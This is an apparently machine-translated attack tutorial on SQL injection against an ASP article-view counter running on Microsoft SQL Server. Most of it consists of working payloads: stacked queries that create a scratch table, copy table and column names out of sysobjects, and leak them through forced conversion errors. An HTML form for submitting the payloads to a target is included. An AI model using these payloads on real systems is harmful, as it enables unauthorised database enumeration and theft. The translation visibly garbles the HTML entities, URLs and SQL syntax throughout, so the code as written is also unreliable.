Uncommon SQL injection methods

☆The full-site article system uses the FSO static HTML file for display. This can reduce the server load and increase the access speed. The second is to prevent SQL injection attacks...

System principle:
All articles have a copy in the database. In addition, an HTML page is generated based on the template.
Attack method: Check whether the source file is called through JS.
For example, call <script language = "javascript" src = "count. asp? Id = 1552 "> </script> to update the browsing times of an article.

We can try to see if injection is possible:
Http: // server domain name/count. asp? Id = 1552
Check whether an error occurs. If an error occurs, it indicates that the injection vulnerability exists. Normal attacks can be taken.

Create a post.htmfile and a log.txt text file on the local machine (for record)

Post.htm content: easy to enter...
Copy the content to the clipboard code:
& Lt; iframe name = p src = # width = 800 height = 350 frameborder = 0 & gt; & lt;/iframe & gt;
& Lt; br & gt;
& Lt; form action = http://test.com/count.asp target = p & gt;
<Input name = "id" value = "1552; update aaa set aaa = (select top 1 name from sysobjects where xtype = u and status & gt; 0 ); -- "style =" width: 750 "& gt;
& Lt; input type = submit value = "& gt;" & gt;
& Lt; input type = hidden name = fno value = "2, 3" & gt;
& Lt;/form & gt;
The SQL server can be judged as follows: add a semicolon after 1552. If it is normal, SQL SERVER can create a table id = 1552 for such databases; create table aaa (aaa char (20 ));--

Insert a record: id = 1552; insert into aaa values (test );--

Next, I will name his data table:

Id = 1552; update aaa set aaa = (select top 1 name from sysobjects where xtype = u and status & gt; 0 );--

This is to update the first table name to the aaa field.

Id = 1552 and exists (select * from aaa where aaa> 5) An error is reported. In most cases, the table name is read directly: Microsoft ole db Provider for SQL Server Error 80040e07, A syntax error occurs when you convert varchar value vote to a column whose data type is int.

/Search. asp, row 21

Here, vote is the table name:

You can also guess a table name, and then update the value of (select top 1 name from sysobjects where xtype = u and status> 0) to a record of that table. Display on the webpage.

Read the first table. The second table can be read in this way (ADD and name <> the name of the table just obtained after the condition ).

Id = 1552; update aaa set aaa = (select top 1 name from sysobjects where xtype = u and status & gt; 0 and name & lt; & gt; vote );--

Then id = 1552 and exists (select * from aaa where aaa> 5) read the second table one by one until there is no.

Read field:

Id = 1552; update aaa set aaa = (select top 1 col_name (object_id (table name), 1 ));--

Then the id = 1552 and exists (select * from aaa where aaa> 5) error occurs. The field name id = 1552 is obtained; update aaa set aaa = (select top 1 col_name (object_id (table name), 2); -- then id = 1552 and exists (select * from aaa where aaa> 5) error, obtain the field name.

...... And so on ......